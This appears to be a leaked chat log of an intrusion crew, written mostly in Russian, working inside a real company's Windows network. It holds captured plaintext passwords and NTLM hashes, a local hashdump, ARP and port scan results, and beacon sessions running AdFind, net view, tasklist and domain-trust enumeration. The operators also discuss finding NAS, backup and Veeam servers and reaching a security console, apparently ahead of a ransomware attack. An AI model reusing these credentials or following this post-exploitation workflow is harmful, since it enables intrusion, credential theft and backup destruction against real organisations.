Description . . . . . . . . . . . : Microsoft Wi-Fi Direct Virtual Adapter #2
Physical Address. . . . . . . . . : 62-F2-62-90-AE-61
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
Ethernet adapter Ethernet 2:
Media State. . . . . . . . . . . : Media disconnected
Connection-specific DNS suffix :
Description . . . . . . . . . . . : Fortinet Virtual Ethernet Adapter (NDIS 6.30)
Physical Address. . . . . . . . . : 00-09-0F-FE-00-01
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
Wireless LAN adapter WiFi:
Connection-specific DNS Suffix :
Description . . . . . . . . . . . : Intel(R) Wi-Fi 6 AX200 160MHz
Physical Address. . . . . . . . . : 3E-5E-B9-EB-F9-F8
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
IPv6 Address. . . . . . . . . . . : 2a02:c7f:d417:c000:fcae:695d:8216:8644(Preferred)
IPv6 Address. . . . . . . . . . . : fda8:e756:3c36:0:fcae:695d:8216:8644(Preferred)
Temporary IPv6 Address. . . . . . : 2a02:c7f:d417:c000:848b:70e:a51c:a5c3(Preferred)
Temporary IPv6 Address. . . . . . : fda8:e756:3c36:0:6806:3a52:eadd:8175(Preferred)
Link-local IPv6 Address . . . . . : fe80::fcae:695d:8216:8644%10(Preferred)
IPv4 Address. . . . . . . . . . . : 192.168.0.16(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Lease Obtained. . . . . . . . . . : 21 September 2020 17:20:50
Lease Expires . . . . . . . . . . : 23 September 2020 13:55:43
Default Gateway . . . . . . . fe80::3e89:94ff:fe6e:1249%10
192.168.0.1
DHCP Server . . . . . . . . . . . : 192.168.0.1
DHCPv6 IAID . . . . . . . . . . : 174125666
DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-25-FB-F4-0B-E8-D8-D1-F3-F7-7E
DNS Servers . . . . . . . . . . . : fda8:e756:3c36:0:3e89:94ff:fe6e:1248
NetBIOS over Tcpip. . . . . . . . : Enabled
Ethernet adapter Bluetooth Network Connection:
Media State. . . . . . . . . . . : Media disconnected
Connection-specific DNS suffix :
Description . . . . . . . . . . . : Bluetooth Device (Personal Area Network)
Physical Address. . . . . . . . . : 60-F2-62-90-AE-65
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
Tunnel adapter Teredo Tunneling Pseudo-Interface:
Connection-specific DNS Suffix :
Description . . . . . . . . . . . : Microsoft Teredo Tunneling Adapter
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
IPv6 Address. . . . . . . . . . . : 2001:0:2851:7ae4:2036:bad:a1f9:8e7c(Preferred)
Link-local IPv6 Address . . . . . : fe80::2036:bad:a1f9:8e7c%11(Preferred)
Default Gateway . . . . . . . . :
NetBIOS over Tcpip. . . . . . . . : Disabled
``````
(ARP) Target '192.168.0.16' is alive. 3E-5E-B9-EB-F9-F8
(ARP) Target '192.168.0.1' is alive. 3C-89-94-6E-12-49
(ARP) Target '192.168.0.26' is alive. BC-A5-11-97-4D-A1
(ARP) Target '192.168.0.12' is alive. (ARP) Target '192.168.0.3' is alive. (ARP) Target '192.168.0.23' is alive. 02(ARP) Target '192.168.0.2' is alive. AC(ARP) Target '192.168.0.4' is alive. (ARP) Target '192.168.0.8' is alive.
(ARP) Target '192.168.0.6' is alive. B0-68-E6-1D-DC-8F
(ARP) Target '192.168.0.18' is alive. F0-99-B6-26-91-33
(ARP) Target '192.168.0.9' is alive. 0C-B2-B7-1C-9C-9B
(ARP) Target '192.168.0.7' is alive. 02-0F-B5-81-CD-E1
(ARP) Target '192.168.0.17' is alive. BC-92-6B-7A-D8-BF
(ARP) Target '192.168.0.10' is alive. (ARP) Target '192.168.0.13' is alive. C098--3801--96A7--6492--6437--DC83
(ARP) Target '192.168.0.128' is alive. 02-0F-B5-0B-15-44
192.168.0.10:631
192.168.0.10:515
192.168.0.10:443
192.168.0.10:23
192.168.0.10:80
192.168.0.10:21 (220 FTP print service:V-1.13/Use the network password for the ID if updating.)
192.168.0.7:5000
192.168.0.7:53
192.168.0.7:80
192.168.0.8:80
192.168.0.16:5040
192.168.0.16:3389
192.168.0.16:999
192.168.0.16:443
192.168.0.1:5431
192.168.0.16:139
192.168.0.16:135
192.168.0.16:80
192.168.0.1:5300
192.168.0.1:443
192.168.0.1:80
192.168.0.1:53
192.168.0.16:445 (platform: 500 version: 10.0 name: UKHECSLT3028 domain: MATCHES)
``впн не подключен видимо``
domain: UKHECSLT3028
Login: Administrator
Password: 192837465S!
NTLM: f490c4823837a7d002e0176f3c5203ad
Domain: MATCHES
Login: mercedesd
Password: Dinham2323
NTLM: 7c839aa54221edb65e959f18ab9bde41
````hashdump`
```
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f490c4823837a7d002e0176f3c5203ad:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:1a20cb05b4b6db77e592dee4e974e4d9:::
``AdFind дохнет на локальном админе, под другими пользователями вобще не отрабатывает
```
[*] Tasked beacon to run: C:\Users\Administrator\AdFind.exe -f "(objectcategory=person)" > ad_users.txt
[+] host called home, sent: 108 bytes
[+] received output:
AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015
LDAP_BIND: [] Error 0x51 (81) - Server Down
Terminating program.
``````
beacon> shell net localgroup "Administrators"
[*] Tasked beacon to run: net localgroup "Administrators"
[+] host called home, sent: 62 bytes
[+] received output:
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
MATCHES\domain admins
MATCHES\sec_WorkstationLocalAdmin
The command completed successfully.
```у всех>operatingSystem: Windows Server 2012 R2 Standardбля не так прочитал[ ](https://mediaeveryone.com/group/saiglobal-com?msg=k7PCBz9uHZfYGa3QG) да, я это взял из описания в ad_comp``
beacon> shell tasklist /s 10.225.10.53 /v
[*] Tasked beacon to run: tasklist /s 10.225.10.53 /v
[+] host called home, sent: 58 bytes
[+] received output:
Image Name PID Session Name Session# Mem Usage User Name CPU Time
========================= ======== ================ =========== ============ ================================================== ============
System Idle Process 0 Services 0 4 K NT AUTHORITY\SYSTEM 830:25:19
System 4 Services 0 276 K N/A 0:40:04
smss.exe 236 Services 0 1,036 K NT AUTHORITY\SYSTEM 0:00:00
csrss.exe 332 Services 0 4,020 K NT AUTHORITY\SYSTEM 0:00:44
wininit.exe 388 Services 0 3,892 K NT AUTHORITY\SYSTEM 0:00:00
csrss.exe 396 Console 1 3,576 K NT AUTHORITY\SYSTEM 0:00:00
winlogon.exe 440 Console 1 5,904 K NT AUTHORITY\SYSTEM 0:00:00
services.exe 484 Services 0 10,748 K NT AUTHORITY\SYSTEM 1:35:33
lsass.exe 492 Services 0 17,544 K NT AUTHORITY\SYSTEM 0:06:05
svchost.exe 556 Services 0 11,484 K NT AUTHORITY\SYSTEM 0:01:11
svchost.exe 600 Services 0 9,812 K NT AUTHORITY\NETWORK SERVICE 0:12:19
LogonUI.exe 684 Console 1 24,144 K NT AUTHORITY\SYSTEM 0:00:00
MsMpEng.exe 696 Services 0 175,280 K NT AUTHORITY\SYSTEM 1:37:48
dwm.exe 704 Console 1 22,012 K Window Manager\DWM-1 0:00:00
svchost.exe 808 Services 0 17,876 K NT AUTHORITY\LOCAL SERVICE 0:14:12
svchost.exe 848 Services 0 15,752 K NT AUTHORITY\SYSTEM 0:00:37
svchost.exe 868 Services 0 61,204 K NT AUTHORITY\SYSTEM 2:42:51
svchost.exe 920 Services 0 14,020 K NT AUTHORITY\LOCAL SERVICE 0:00:26
svchost.exe 1000 Services 0 21,656 K NT AUTHORITY\NETWORK SERVICE 0:05:03
svchost.exe 584 Services 0 11,044 K NT AUTHORITY\LOCAL SERVICE 0:00:39
spoolsv.exe 1132 Services 0 13,264 K NT AUTHORITY\SYSTEM 0:00:11
svchost.exe 1168 Services 0 7,832 K NT AUTHORITY\SYSTEM 0:00:05
ir_agent.exe 1188 Services 0 13,808 K NT AUTHORITY\SYSTEM 0:01:04
conhost.exe 1300 Services 0 3,024 K NT AUTHORITY\SYSTEM 0:00:01
newrelic-infra.exe 1308 Services 0 26,188 K NT AUTHORITY\SYSTEM 5:46:01
ir_agent.exe 1324 Services 0 66,396 K NT AUTHORITY\SYSTEM 1:05:42
snmp.exe 1400 Services 0 6,988 K NT AUTHORITY\SYSTEM 0:02:56
svchost.exe 1416 Services 0 15,644 K NT AUTHORITY\SYSTEM 0:01:38
svchost.exe 1440 Services 0 13,916 K NT AUTHORITY\SYSTEM 0:00:39
vmtoolsd.exe 1472 Services 0 13,900 K NT AUTHORITY\SYSTEM 0:09:48
WmiApSrv.exe 1572 Services 0 8,292 K NT AUTHORITY\SYSTEM 0:01:02
wmi_exporter.exe 1656 Services 0 15,924 K NT AUTHORITY\SYSTEM 0:00:34
WmiPrvSE.exe 1764 Services 0 40,132 K NT AUTHORITY\SYSTEM 0:37:12
WmiPrvSE.exe 1784 Services 0 24,328 K NT AUTHORITY\NETWORK SERVICE 4:11:00
svchost.exe 1536 Services 0 67,976 K NT AUTHORITY\NETWORK SERVICE 0:01:17
svchost.exe 2156 Services 0 4,808 K NT AUTHORITY\NETWORK SERVICE 0:00:03
dllhost.exe 2300 Services 0 10,956 K NT AUTHORITY\SYSTEM 0:00:04
msdtc.exe 2496 Services 0 7,384 K NT AUTHORITY\NETWORK SERVICE 0:00:03
WmiPrvSE.exe 2820 Services 0 10,876 K NT AUTHORITY\LOCAL SERVICE 0:23:58
CcmExec.exe 3364 Services 0 118,580 K NT AUTHORITY\SYSTEM 0:12:01
WmiPrvSE.exe 3396 Services 0 26,704 K NT AUTHORITY\SYSTEM 0:00:36
WmiPrvSE.exe 3644 Services 0 30,296 K NT AUTHORITY\SYSTEM 0:18:55
WmiPrvSE.exe 3752 Services 0 10,024 K NT AUTHORITY\LOCAL SERVICE 0:02:27
WmiPrvSE.exe 552 Services 0 6,632 K NT AUTHORITY\LOCAL SERVICE 0:00:01
CmRcService.exe 2088 Services 0 8,784 K NT AUTHORITY\SYSTEM 0:00:09
ir_agent.exe 3136 Services 0 100,072 K NT AUTHORITY\SYSTEM 0:43:25
ir_agent.exe 244 Services 0 63,524 K NT AUTHORITY\SYSTEM 0:25:59
ir_agent.exe 3260 Services 0 47,284 K NT AUTHORITY\SYSTEM 0:05:57
csrss.exe 2252 RDP-Tcp#0 2 14,128 K NT AUTHORITY\SYSTEM 0:00:00
winlogon.exe 1068 RDP-Tcp#0 2 5,292 K NT AUTHORITY\SYSTEM 0:00:00
dwm.exe 2216 RDP-Tcp#0 2 39,120 K Window Manager\DWM-2 0:00:04
taskhostex.exe 3388 RDP-Tcp#0 2 6,520 K DATACENTER\adm.cotral0 0:00:00
rdpclip.exe 2268 RDP-Tcp#0 2 6,908 K DATACENTER\adm.cotral0 0:00:00
explorer.exe 1716 RDP-Tcp#0 2 99,236 K DATACENTER\adm.cotral0 0:00:20
WmiPrvSE.exe 2068 Services 0 15,960 K NT AUTHORITY\SYSTEM 0:00:22
vmtoolsd.exe 2916 RDP-Tcp#0 2 12,688 K DATACENTER\adm.cotral0 0:03:14
msseces.exe 2116 RDP-Tcp#0 2 13,852 K DATACENTER\adm.cotral0 0:00:00
SCNotification.exe 1100 RDP-Tcp#0 2 40,204 K DATACENTER\adm.cotral0 0:00:06
xagt.exe 2064 Services 0 7,516 K NT AUTHORITY\SYSTEM 0:00:01
xagtnotif.exe 3276 RDP-Tcp#0 2 6,520 K DATACENTER\adm.cotral0 0:00:00
ir_agent.exe 1208 Services 0 51,040 K NT AUTHORITY\SYSTEM 0:00:06
ir_agent.exe 3624 Services 0 49,988 K NT AUTHORITY\SYSTEM 0:00:06
```что в operation system в ад написано у них?UAT это вряд ли НАС ))))процессы посмотрите ещепинг -> shell dir \\223145483475843\C$
?```
Предположительно насы:
>description: C360 Client Files
USHDC1-CSPFPS03.datacenter.local
USHDC1-CSPFPS12.datacenter.local
USHDC1-CSPFPS08.datacenter.local
USHDC1-CSPFPS02.datacenter.local
USHDC1-CSPFPS04.datacenter.local
USHDC1-CSPFPS14.datacenter.local
USHDC1-CSPFPS13.datacenter.local
USHDC1-CSPFPS10.datacenter.local
USHDC1-CSPFPS01.datacenter.local
USHDC1-CSPFPS09.datacenter.local
USHDC1-CSPFPS11.datacenter.local
USHDC1-CSPFPS06.datacenter.local
USHDC1-CSPFPS05.datacenter.local
USHDC1-CSPFPS07.datacenter.local
>description: C360 UAT File Servers
USHDC1-CSQFPS01.datacenter.local
USHDC1-CSQFPS02.datacenter.local
```14 клиентских
2 UATвсе SSOможно не притягивать дажепритянуть и полазить там?а они все фс?осмотреть[ ](https://mediaeveryone.com/group/saiglobal-com?msg=6LW23aHAC5BNgtnSZ) ты имешь ввиду то, что я скинул выше?файловые серверы можете осмотреть ещесли в этом домене пока ничего нет под бэкап, ищем виртуализацию)ну я вроде датацентр разбираюв других доменах тоже нет ничего разве?```
user 2-2[AUHDC1-COPADS01]SYSTEM */5008|2020Oct08 02:29:22> net view
[*] Tasked beacon to run net view
[+] host called home, sent: 104504 bytes
[+] received output:
List of hosts:
Server Name IP Address Platform Version Type Comment
----------- ---------- -------- ------- ---- -------
APP01 10.195.25.144 500 5.2 PDC
[+] received output:
APP02 10.195.25.147 500 5.2
AUHDC1-COPADS01 10.195.25.50 500 6.3 PDC
AUHDC1-COPADS02 10.195.25.49 500 6.3 BDC
AUHDC1-COPADS04 10.195.25.35 500 6.3 BDC
AUHDC1-COPADS05 10.195.25.43 500 10.0 BDC
AUHDC1-COPAPP08 10.195.25.20 500 6.3
AUHDC1-COPFPS01 10.195.25.115 500 6.3
AUHDC1-COPFPS02 10.195.25.3 500 6.3
AUHDC1-COPFPS03 10.195.25.54 500 10.0
AUHDC1-COPSCM01 10.195.25.210 500 6.3
AUHDC1-COPSCM02 10.195.25.211 500 6.3
AUHDC1-COPSCM04 10.195.25.218 500 6.3
AUHDC1-COPSQL01 10.195.25.212 500 6.3
AUHDC1-COPSQL02 10.195.25.213 500 6.3
AUHDC1-COPSQL11 10.195.25.125 500 6.3
AUHDC1-COQSQL06 10.195.25.36 500 6.3
AUSYDE95X-SON2 10.195.25.184 500 6.0
AUSYDHC-APP006 10.195.25.84 500 4.0
AUSYDHC-APP016 10.195.25.76 500 5.2
AUSYDHC-APP025 10.195.25.175 500 5.2
AUSYDHC-APP027 10.195.25.94 500 6.0
AUSYDHC-COPMG05 10.195.25.242 500 6.1
AUSYDHC-CS-APP1 10.195.25.114 500 5.2
AUSYDHC-CS-MOS1 10.195.25.63 500 5.2
AUSYDHC-CSPSQ01 10.195.25.214 500 6.1
AUSYDHC-EPPCON1 10.195.25.235 500 6.0
AUSYDHC-EPPPS1 10.195.25.52 500 10.0
AUSYDHC-EPPREP1 10.195.25.225 500 6.0
AUSYDHC-EPPREP2 10.195.25.226 500 6.0
AUSYDHC-EPPSON1 10.195.25.238 500 6.0
AUSYDHC-LDS1 10.195.25.62 500 6.0
AUSYDHC-SQL16 10.195.25.178 500 6.1
AUSYDHQ-FS1 10.195.25.3 500 6.3
AUSYDHQ-FS1TEST 10.195.25.3 500 6.3
```>description: C360 UAT File Servers>description: C360 Client Filesа net view не прокатит ?NAS
Backup
Veeam
нетуагавиим - Veeam?в именах хостов нет каких-то ключевых слов указывающих на НАС, бэкап, вим и т д?а как их выцепить?зачем?тогда portscan 21 22 ?они могут быть виндовыесли в ad_comp нет линуксов, значит насов тоже нет? :thinking:но я думаю что еще минимум 2-3 шт получится открытьт не будет 100% покрытия и часть доменов не будет видна ни откудакаждый домен может видеть часть трастов которые изначально не видно быловот у вас в общем списке 19шт было изначальноугуdatacenter.local
```
0: SAIG saig.frd.global (Direct Outbound) (Direct Inbound)
1: FRD frd.global (Direct Outbound) (Direct Inbound)
2: DATACENTER datacenter.local (Forest tree root) (Primary Domain) (Native)
``вот еще снимите как раз из текущего где @user8`saig.frd.global`которые в АДвот в этом saiglobal.com
у него в трастах было 2 датацентра[ ](https://mediaeveryone.com/group/saiglobal-com?msg=t7mimJ5JXQBP2Qbrf) подпиши плиз из какого доменазначит один домен видит часть трастов из общего списка который не видит другие``
0: 80-20 80-20.com (Direct Outbound) (Direct Inbound)
1: LEGALCO legalco.local (Direct Outbound) (Direct Inbound)
2: FRD frd.global (Forest tree root) (Direct Outbound) (Direct Inbound)
3: ANSTAT Anstat.local (Direct Outbound) (Direct Inbound)
4: LEADERS leaders.frd.global
5: AUST standards.com.au (Direct Outbound) (Direct Inbound)
6: SAIGPROD SaigProd.local (Direct Outbound) (Direct Inbound)
7: C360 c360.local (Direct Outbound) (Direct Inbound)
8: DATACENTER datacenter.local (Direct Outbound) (Direct Inbound)
9: C360UK c360uk.local (Direct Outbound) (Direct Inbound)
10: SAIG saig.frd.global (Forest 2) (Primary Domain) (Native)
``они не 1 в 1между разными доменами где сессии висятсравни просто net domain_trustsайпишник один и тот же1 из в карантинетам трастах 2 датацентра точноне поняля как минимум замечал разные между frd.global и saig...., datacenter...в трасты потом все равно лезть придетсяок пока доделывай остальное по домену-[ ](https://mediaeveryone.com/group/saiglobal-com?msg=BxbusgHiy84BsvA2G) трастыновыми в плане прям новыми или трастами от этого?10 - 0% лосс``
Web Server - 25
```
а есть другие сервера этой категории которые отвечают на пинг корректно ?ты так и не занимался новыми доменами?крепинг завтра сделать можно будет или еще поискать вариантыкинь пока в 100% lossв датацентрес дка ты откуда пингуешь кст?=> рдс и ссо в дизейбл, веб оставляю?к тому же это в 1 доменевеб не особо критичные я думаю100% лоссштукRDS - 2
Web Server - 25
SSO - 1категорииназначение?что подразумевается под "критичные "28критичные?много таких?серваки с 100% loss тоже в Disabled?прально)и теперь пинговать все, чтобы узнать какие ещё отрублены :sunglasses:агав Disabled Servers закину тогда?``
beacon> shell ping USHDC1-CSPSPH01.datacenter.local
[*] Tasked beacon to run: ping USHDC1-CSPSPH01.datacenter.local
[+] host called home, sent: 68 bytes
[+] received output:
Ping request could not find host USHDC1-CSPSPH01.datacenter.local. Please check the name and try again.
beacon> shell ping USHDC1-CSPSPH02.datacenter.local
[*] Tasked beacon to run: ping USHDC1-CSPSPH02.datacenter.local
[+] host called home, sent: 68 bytes
[+] received output:
Ping request could not find host USHDC1-CSPSPH02.datacenter.local. Please check the name and try again.
```
Это вот эти последниеOU=C360 - SSO сервера с разными сервисами аутлучными я полагаю
OU=SCCM - SCCM серваки
последний не знаю...``
CN=USHDC1-CSPFPS03,OR=Production,OR=C360,OR=Servers,OR=0.SAI Global,DC=datacenter,DC=local
>dNSHostName: USHDC1-CSPFPS03.datacenter.local
>servicePrincipalName: CmRcService/USHDC1-CSPFPS03
>servicePrincipalName: CmRcService/USHDC1-CSPFPS03.datacenter.local
>servicePrincipalName: WSMAN/USHDC1-CSPFPS03
>servicePrincipalName: WSMAN/USHDC1-CSPFPS03.datacenter.local
>servicePrincipalName: TERMSRV/USHDC1-CSPFPS03
>servicePrincipalName: TERMSRV/USHDC1-CSPFPS03.datacenter.local
>servicePrincipalName: RestrictedKrbHost/USHDC1-CSPFPS03
>servicePrincipalName: HOST/USHDC1-CSPFPS03
>servicePrincipalName: RestrictedKrbHost/USHDC1-CSPFPS03.datacenter.local
>servicePrincipalName: HOST/USHDC1-CSPFPS03.datacenter.local
```
```
CN=USHDC1-CSPMGW02,OR=Production,OR=C360,OR=Servers,OR=0.SAI Global,DC=datacenter,DC=local
>dNSHostName: USHDC1-CSPMGW02.datacenter.local
>servicePrincipalName: WSMAN/USHDC1-CSPMGW02.datacenter.local
>servicePrincipalName: WSMAN/USHDC1-CSPMGW02
>servicePrincipalName: CmRcService/USHDC1-CSPMGW02.datacenter.local
>servicePrincipalName: CmRcService/USHDC1-CSPMGW02
>servicePrincipalName: TERMSRV/USHDC1-CSPMGW02.datacenter.local
>servicePrincipalName: TERMSRV/USHDC1-CSPMGW02
>servicePrincipalName: RestrictedKrbHost/USHDC1-CSPMGW02
>servicePrincipalName: HOST/USHDC1-CSPMGW02
>servicePrincipalName: RestrictedKrbHost/USHDC1-CSPMGW02.datacenter.local
>servicePrincipalName: HOST/USHDC1-CSPMGW02.datacenter.local
```
```
CN=USHDC1-CSPAPP23,OR=Production,OR=C360,OR=Servers,OR=0.SAI Global,DC=datacenter,DC=local
>dNSHostName: USHDC1-CSPAPP23.datacenter.local
>servicePrincipalName: CmRcService/USHDC1-CSPAPP23
>servicePrincipalName: CmRcService/USHDC1-CSPAPP23.datacenter.local
>servicePrincipalName: WSMAN/USHDC1-CSPAPP23
>servicePrincipalName: WSMAN/USHDC1-CSPAPP23.datacenter.local
>servicePrincipalName: TERMSRV/USHDC1-CSPAPP23
>servicePrincipalName: TERMSRV/USHDC1-CSPAPP23.datacenter.local
>servicePrincipalName: RestrictedKrbHost/USHDC1-CSPAPP23
>servicePrincipalName: HOST/USHDC1-CSPAPP23
>servicePrincipalName: RestrictedKrbHost/USHDC1-CSPAPP23.datacenter.local
>servicePrincipalName: HOST/USHDC1-CSPAPP23.datacenter.local
```
```
CN=USHDC1-COPSCM02,OR=SCCM,OR=Corporate IT,OR=Servers,OR=0.SAI Global,DC=datacenter,DC=local
>dNSHostName: USHDC1-COPSCM02.datacenter.local
>servicePrincipalName: CmRcService/USHDC1-COPSCM02.datacenter.local
>servicePrincipalName: CmRcService/USHDC1-COPSCM02
>servicePrincipalName: WSMAN/USHDC1-COPSCM02.datacenter.local
>servicePrincipalName: WSMAN/USHDC1-COPSCM02
>servicePrincipalName: TERMSRV/USHDC1-COPSCM02.datacenter.local
>servicePrincipalName: TERMSRV/USHDC1-COPSCM02
>servicePrincipalName: RestrictedKrbHost/USHDC1-COPSCM02
>servicePrincipalName: HOST/USHDC1-COPSCM02
>servicePrincipalName: RestrictedKrbHost/USHDC1-COPSCM02.datacenter.local
>servicePrincipalName: HOST/USHDC1-COPSCM02.datacenter.local
```
```
CN=USHDC1-CSPSPH02,OR=Production,OR=DM360,OR=Servers,OR=0.SAI Global,DC=datacenter,DC=local
>dNSHostName: USHDC1-CSPSPH02.datacenter.local
>servicePrincipalName: CmRcService/USHDC1-CSPSPH02.datacenter.local
>servicePrincipalName: CmRcService/USHDC1-CSPSPH02
>servicePrincipalName: WSMAN/USHDC1-CSPSPH02.datacenter.local
>servicePrincipalName: WSMAN/USHDC1-CSPSPH02
>servicePrincipalName: TERMSRV/USHDC1-CSPSPH02
>servicePrincipalName: TERMSRV/USHDC1-CSPSPH02.datacenter.local
>servicePrincipalName: RestrictedKrbHost/USHDC1-CSPSPH02
>servicePrincipalName: HOST/USHDC1-CSPSPH02
>servicePrincipalName: RestrictedKrbHost/USHDC1-CSPSPH02.datacenter.local
>servicePrincipalName: HOST/USHDC1-CSPSPH02.datacenter.local
``все*кинь полные хостнеймы с группамиMX даускорило бы процесс работывстречаются уже не первый рази ещё, на что указывают:
FPS
MGW
ARP
SCM
SEC
SPH
?```
USHDC1-360MX2.datacenter.local
USHDC1-360MX1.datacenter.local
```
Эти в эксчейнж, выходит?тут в сети стоит rapid7
надо ан машинах теханрей поискать доступ в его консольукажи его...как file server``
Image Name PID Session Name Session# Mem Usage User Name CPU Time
========================= ======== ================ =========== ============ ================================================== ============
System Idle Process 0 Services 0 4 K NT AUTHORITY\SYSTEM 827:32:16
System 4 Services 0 264 K N/A 5:43:18
smss.exe 224 Services 0 1,036 K NT AUTHORITY\SYSTEM 0:00:00
csrss.exe 340 Services 0 3,964 K NT AUTHORITY\SYSTEM 0:00:25
csrss.exe 396 Console 1 3,472 K NT AUTHORITY\SYSTEM 0:00:00
wininit.exe 404 Services 0 3,896 K NT AUTHORITY\SYSTEM 0:00:00
winlogon.exe 448 Console 1 5,900 K NT AUTHORITY\SYSTEM 0:00:00
services.exe 492 Services 0 10,908 K NT AUTHORITY\SYSTEM 0:52:07
lsass.exe 500 Services 0 17,576 K NT AUTHORITY\SYSTEM 0:06:28
svchost.exe 560 Services 0 9,644 K NT AUTHORITY\SYSTEM 0:01:19
svchost.exe 592 Services 0 9,244 K NT AUTHORITY\NETWORK SERVICE 0:03:50
LogonUI.exe 688 Console 1 27,424 K NT AUTHORITY\SYSTEM 0:00:00
MsMpEng.exe 700 Services 0 243,516 K NT AUTHORITY\SYSTEM 2:25:24
dwm.exe 712 Console 1 30,044 K Window Manager\DWM-1 0:00:00
svchost.exe 816 Services 0 15,376 K NT AUTHORITY\LOCAL SERVICE 0:08:36
svchost.exe 844 Services 0 15,452 K NT AUTHORITY\SYSTEM 0:00:36
svchost.exe 860 Services 0 86,460 K NT AUTHORITY\SYSTEM 1:19:39
svchost.exe 912 Services 0 12,748 K NT AUTHORITY\LOCAL SERVICE 0:00:25
svchost.exe 992 Services 0 21,736 K NT AUTHORITY\NETWORK SERVICE 0:05:02
svchost.exe 532 Services 0 11,000 K NT AUTHORITY\LOCAL SERVICE 0:00:29
spoolsv.exe 1108 Services 0 13,520 K NT AUTHORITY\SYSTEM 0:00:13
svchost.exe 1148 Services 0 7,856 K NT AUTHORITY\SYSTEM 0:00:05
ir_agent.exe 1172 Services 0 13,176 K NT AUTHORITY\SYSTEM 0:01:04
conhost.exe 1292 Services 0 3,016 K NT AUTHORITY\SYSTEM 0:00:02
snmp.exe 1304 Services 0 6,856 K NT AUTHORITY\SYSTEM 0:03:05
svchost.exe 1336 Services 0 13,584 K NT AUTHORITY\SYSTEM 0:00:59
vmtoolsd.exe 1352 Services 0 13,800 K NT AUTHORITY\SYSTEM 0:09:42
ir_agent.exe 1372 Services 0 63,968 K NT AUTHORITY\SYSTEM 1:09:54
WmiApSrv.exe 1460 Services 0 8,472 K NT AUTHORITY\SYSTEM 0:01:01
wmi_exporter.exe 1484 Services 0 16,032 K NT AUTHORITY\SYSTEM 0:00:32
WmiPrvSE.exe 1624 Services 0 23,088 K NT AUTHORITY\NETWORK SERVICE 1:55:27
WmiPrvSE.exe 1640 Services 0 48,744 K NT AUTHORITY\SYSTEM 0:31:54
svchost.exe 1908 Services 0 8,936 K NT AUTHORITY\NETWORK SERVICE 0:00:31
svchost.exe 2012 Services 0 4,792 K NT AUTHORITY\NETWORK SERVICE 0:00:02
dllhost.exe 2132 Services 0 11,008 K NT AUTHORITY\SYSTEM 0:00:04
msdtc.exe 2484 Services 0 7,336 K NT AUTHORITY\NETWORK SERVICE 0:00:04
WmiPrvSE.exe 2572 Services 0 29,720 K NT AUTHORITY\SYSTEM 0:19:40
CcmExec.exe 3696 Services 0 113,032 K NT AUTHORITY\SYSTEM 0:11:09
WmiPrvSE.exe 3804 Services 0 13,636 K NT AUTHORITY\SYSTEM 0:00:37
ir_agent.exe 3964 Services 0 92,692 K NT AUTHORITY\SYSTEM 0:40:51
ir_agent.exe 3972 Services 0 63,404 K NT AUTHORITY\SYSTEM 0:25:50
ir_agent.exe 4016 Services 0 47,476 K NT AUTHORITY\SYSTEM 0:06:02
CmRcService.exe 1648 Services 0 8,784 K NT AUTHORITY\SYSTEM 0:00:14
WmiPrvSE.exe 3320 Services 0 6,708 K NT AUTHORITY\LOCAL SERVICE 0:00:01
WmiPrvSE.exe 3048 Services 0 10,388 K NT AUTHORITY\LOCAL SERVICE 0:02:01
ir_agent.exe 2832 Services 0 55,420 K NT AUTHORITY\SYSTEM 0:06:02
ir_agent.exe 2392 Services 0 51,596 K NT AUTHORITY\SYSTEM 0:26:38
xagt.exe 3944 Services 0 7,272 K NT AUTHORITY\SYSTEM 0:00:02
WmiPrvSE.exe 3280 Services 0 8,820 K NT AUTHORITY\LOCAL SERVICE 0:00:00
WmiPrvSE.exe 3600 Services 0 8,176 K NT AUTHORITY\SYSTEM 0:00:00
WmiPrvSE.exe 3396 Services 0 12,148 K NT AUTHORITY\SYSTEM 0:00:00
msiexec.exe 2712 Services 0 5,868 K NT AUTHORITY\SYSTEM 0:00:00
``покажи пиды пожалуйстапутано очень...DC - указание на домен контроллер
FS - указание на файловый сервер
360 - указание на эксчендж вообще, точнее на ССО авторизацию через офис360у этой тачкиа у него один интерфейс?у дк же в спн лдапы, да и в оушке должно быть написаноне? )это домен контроллер....``
CN=USHDC1-360FS1,OU=Production,OU=C360,OU=Servers,OU=0.SAI Global,DC=datacenter,DC=local
>dNSHostName: USHDC1-360FS1.datacenter.local
>servicePrincipalName: CmRcService/USHDC1-360FS1.datacenter.local
>servicePrincipalName: CmRcService/USHDC1-360FS1
>servicePrincipalName: WSMAN/USHDC1-360FS1.datacenter.local
>servicePrincipalName: WSMAN/USHDC1-360FS1
>servicePrincipalName: TERMSRV/USHDC1-360FS1
>servicePrincipalName: TERMSRV/USHDC1-360FS1.datacenter.local
>servicePrincipalName: RestrictedKrbHost/USHDC1-360FS1
>servicePrincipalName: HOST/USHDC1-360FS1
>servicePrincipalName: RestrictedKrbHost/USHDC1-360FS1.datacenter.local
>servicePrincipalName: HOST/USHDC1-360FS1.datacenter.local
``нуу наверное...
а как хост назыается и какая у него ОУ / группа?хмв DEV могу внести?``
Name
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.40660
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219
Microsoft Visual C++ 2005 Redistributable (x64)
VMware Tools
Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.60610
Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.60610
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.40660
Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.60610
